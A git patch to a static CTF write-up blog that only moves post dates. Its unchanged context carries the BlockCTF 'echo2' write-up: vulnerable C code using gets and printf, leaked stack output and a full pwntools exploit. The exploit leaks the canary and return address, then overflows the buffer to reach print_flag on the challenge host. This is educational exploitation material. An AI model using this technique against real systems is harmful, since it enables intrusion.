From 4bcfc46dbf74096192d55a74df0a6c7e766375cb Mon Sep 17 00:00:00 2001
From: daniel <daniel>
Date: Sun, 17 Nov 2024 22:59:41 -0500
Subject: [PATCH] timestamp

---
 content/posts/block-ctf-2024-echo2.md        |  2 +-
 public/index.html                            |  2 +-
 public/index.xml                             |  4 ++--
 public/posts/block-ctf-2024-echo2/index.html | 10 +++++-----
 public/posts/index.html                      |  2 +-
 public/posts/index.xml                       |  4 ++--
 public/sitemap.xml                           |  6 +++---
 7 files changed, 15 insertions(+), 15 deletions(-)

diff --git a/content/posts/block-ctf-2024-echo2.md b/content/posts/block-ctf-2024-echo2.md
index 6b38810..06798f9 100644
--- a/content/posts/block-ctf-2024-echo2.md
+++ b/content/posts/block-ctf-2024-echo2.md
@@ -1,6 +1,6 @@
 +++
 title = 'BlockCTF 2024 - pwn/echo2'
-date = 2024-11-17T22:52:37-05:00
+date = 2024-11-11T20:52:37-05:00
 draft = false
 +++
 
diff --git a/public/index.html b/public/index.html
index 5eeab5d..70e5594 100644
--- a/public/index.html
+++ b/public/index.html
@@ -167,7 +167,7 @@ <h2 class="entry-hint-parent">BlockCTF 2024 - pwn/echo2
     <p>We are given a binary with all protectoins turned on and c source code.
 #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....</p>
   </div>
-  <footer class="entry-footer"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span></footer>
+  <footer class="entry-footer"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span></footer>
   <a class="entry-link" aria-label="post link to BlockCTF 2024 - pwn/echo2" href="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"></a>
 </article>
 
diff --git a/public/index.xml b/public/index.xml
index 514f1c8..962f697 100644
--- a/public/index.xml
+++ b/public/index.xml
@@ -6,12 +6,12 @@
     <description>Recent content on CTF Writeups</description>
     <generator>Hugo -- gohugo.io</generator>
     <language>en-us</language>
-    <lastBuildDate>Sun, 17 Nov 2024 22:52:37 -0500</lastBuildDate>
+    <lastBuildDate>Mon, 11 Nov 2024 20:52:37 -0500</lastBuildDate>
     <atom:link href="https://dfoudeh.github.io/index.xml" rel="self" type="application/rss+xml" />
     <item>
       <title>BlockCTF 2024 - pwn/echo2</title>
       <link>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</link>
-      <pubDate>Sun, 17 Nov 2024 22:52:37 -0500</pubDate>
+      <pubDate>Mon, 11 Nov 2024 20:52:37 -0500</pubDate>
       <guid>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</guid>
       <description>We are given a binary with all protectoins turned on and c source code.
 #include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdint.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&amp;#34;flag.txt&amp;#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo().</description>
diff --git a/public/posts/block-ctf-2024-echo2/index.html b/public/posts/block-ctf-2024-echo2/index.html
index f6e24fd..cec9f8d 100644
--- a/public/posts/block-ctf-2024-echo2/index.html
+++ b/public/posts/block-ctf-2024-echo2/index.html
@@ -61,8 +61,8 @@
 #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()." />
 <meta property="og:type" content="article" />
 <meta property="og:url" content="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/" /><meta property="article:section" content="posts" />
-<meta property="article:published_time" content="2024-11-17T22:52:37-05:00" />
-<meta property="article:modified_time" content="2024-11-17T22:52:37-05:00" />
+<meta property="article:published_time" content="2024-11-11T20:52:37-05:00" />
+<meta property="article:modified_time" content="2024-11-11T20:52:37-05:00" />
 
 <meta name="twitter:card" content="summary"/>
 <meta name="twitter:title" content="BlockCTF 2024 - pwn/echo2"/>
@@ -103,8 +103,8 @@
   "articleBody": "We are given a binary with all protectoins turned on and c source code.\n#include #include #include #include #include void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(\"flag.txt\", O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo(). We can set a breakpoint in do_echo() after printf and enter a format string to leak the canary and an address.\nSending our format string\n%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx.%lx.%lx.%lx%lx.%lx We leak out the stack\n5555555592a1.0.7ffff7f8b8e055555555934b.0.2e786c252e786c25.252e786c25786c25.252e786c252e786c6c25786c252e786c.6c252e786c252e78.6c252e786c252e78.786c252e786c2578.786c252e786c252e2e786c25786c252e.2e786c252e786c25.25786c252e786c25.252e786c252e786c.252e786c252e786c6c252e786c25786c.6c252e786c252e78.786c25786c252e78.786c252e786c252e.786c252e786c252e2e786c252e786c25.2e786c252e786c25.252e786c25786c25.786c.00.0.0.0.00.0.0.0.07befa8536e8aba00.7fffffffe338.5555555555b5.5555555555a1.7ffff7dc9e087fffffffe260.7fffffffe338 07befa8536e8aba00 at offset 39 looks like our canary and at offset 41 is the saved RIP. In gdb with the gef extenstoin, we can use the command ‘canary’ to print out the canary and confirm that we have the right one. Similarly we can use ‘info frame’ to see that we have the right RIP.\nThe saved RIP address is main+20. We can calculate the offset between this andress and the start of the print_flag fucntion, which is 908. Putting it all together:\nfrom pwn import * target = remote(\"54.85.45.101\", 8009) # leak canary payload = \"%39$lx\" target.sendline(payload) canary = int(target.recv(16),16) log.info(hex(canary)) # leak RIP payload = \"%41$lx\" target.sendline(payload) rip = int(target.recv(12),16) log.info(hex(rip)) # offset from leak to print_flag = 908 payload = b\"A\" * 264 + p64(canary) + p64(0xdeadbeef) + p64(rip - 908) target.sendline(payload) target.interactive() flag{aslr_and_canari3s_are_n0_match_f0r_l3aky_stacks}\n",
   "wordCount" : "242",
   "inLanguage": "en",
-  "datePublished": "2024-11-17T22:52:37-05:00",
-  "dateModified": "2024-11-17T22:52:37-05:00",
+  "datePublished": "2024-11-11T20:52:37-05:00",
+  "dateModified": "2024-11-11T20:52:37-05:00",
   "mainEntityOfPage": {
     "@type": "WebPage",
     "@id": "https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"
@@ -174,7 +174,7 @@
     <h1 class="post-title entry-hint-parent">
       BlockCTF 2024 - pwn/echo2
     </h1>
-    <div class="post-meta"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span>
+    <div class="post-meta"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span>
 
 </div>
   </header> 
diff --git a/public/posts/index.html b/public/posts/index.html
index 71e7828..482475f 100644
--- a/public/posts/index.html
+++ b/public/posts/index.html
@@ -143,7 +143,7 @@ <h2 class="entry-hint-parent">BlockCTF 2024 - pwn/echo2
     <p>We are given a binary with all protectoins turned on and c source code.
 #include &lt;fcntl.h&gt; #include &lt;stdio.h&gt; #include &lt;stdint.h&gt; #include &lt;stdlib.h&gt; #include &lt;unistd.h&gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&#34;flag.txt&#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo()....</p>
   </div>
-  <footer class="entry-footer"><span title='2024-11-17 22:52:37 -0500 EST'>November 17, 2024</span></footer>
+  <footer class="entry-footer"><span title='2024-11-11 20:52:37 -0500 EST'>November 11, 2024</span></footer>
   <a class="entry-link" aria-label="post link to BlockCTF 2024 - pwn/echo2" href="https://dfoudeh.github.io/posts/block-ctf-2024-echo2/"></a>
 </article>
 
diff --git a/public/posts/index.xml b/public/posts/index.xml
index e699651..5ed1ccb 100644
--- a/public/posts/index.xml
+++ b/public/posts/index.xml
@@ -6,12 +6,12 @@
     <description>Recent content in Posts on CTF Writeups</description>
     <generator>Hugo -- gohugo.io</generator>
     <language>en-us</language>
-    <lastBuildDate>Sun, 17 Nov 2024 22:52:37 -0500</lastBuildDate>
+    <lastBuildDate>Mon, 11 Nov 2024 20:52:37 -0500</lastBuildDate>
     <atom:link href="https://dfoudeh.github.io/posts/index.xml" rel="self" type="application/rss+xml" />
     <item>
       <title>BlockCTF 2024 - pwn/echo2</title>
       <link>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</link>
-      <pubDate>Sun, 17 Nov 2024 22:52:37 -0500</pubDate>
+      <pubDate>Mon, 11 Nov 2024 20:52:37 -0500</pubDate>
       <guid>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</guid>
       <description>We are given a binary with all protectoins turned on and c source code.
 #include &amp;lt;fcntl.h&amp;gt; #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;stdint.h&amp;gt; #include &amp;lt;stdlib.h&amp;gt; #include &amp;lt;unistd.h&amp;gt; void print_flag() { uint8_t flag_buffer[256] = {0}; int fd = open(&amp;#34;flag.txt&amp;#34;, O_RDONLY); read(fd, flag_buffer, sizeof(flag_buffer)); puts(flag_buffer); close(fd); } void do_echo() { uint8_t echo_buffer[256] = {0}; gets(echo_buffer); printf(echo_buffer); fflush(stdout); } int main(void) { while(1) { do_echo(); } return 0; } There is a buffer overflow and printf vulnerability in do_echo().</description>
diff --git a/public/sitemap.xml b/public/sitemap.xml
index b105254..8310a81 100644
--- a/public/sitemap.xml
+++ b/public/sitemap.xml
@@ -3,13 +3,13 @@
   xmlns:xhtml="http://www.w3.org/1999/xhtml">
   <url>
     <loc>https://dfoudeh.github.io/posts/block-ctf-2024-echo2/</loc>
-    <lastmod>2024-11-17T22:52:37-05:00</lastmod>
+    <lastmod>2024-11-11T20:52:37-05:00</lastmod>
   </url><url>
     <loc>https://dfoudeh.github.io/</loc>
-    <lastmod>2024-11-17T22:52:37-05:00</lastmod>
+    <lastmod>2024-11-11T20:52:37-05:00</lastmod>
   </url><url>
     <loc>https://dfoudeh.github.io/posts/</loc>
-    <lastmod>2024-11-17T22:52:37-05:00</lastmod>
+    <lastmod>2024-11-11T20:52:37-05:00</lastmod>
   </url><url>
     <loc>https://dfoudeh.github.io/posts/du-ctf-2024-yawa/</loc>
     <lastmod>2024-07-07T10:47:36-04:00</lastmod>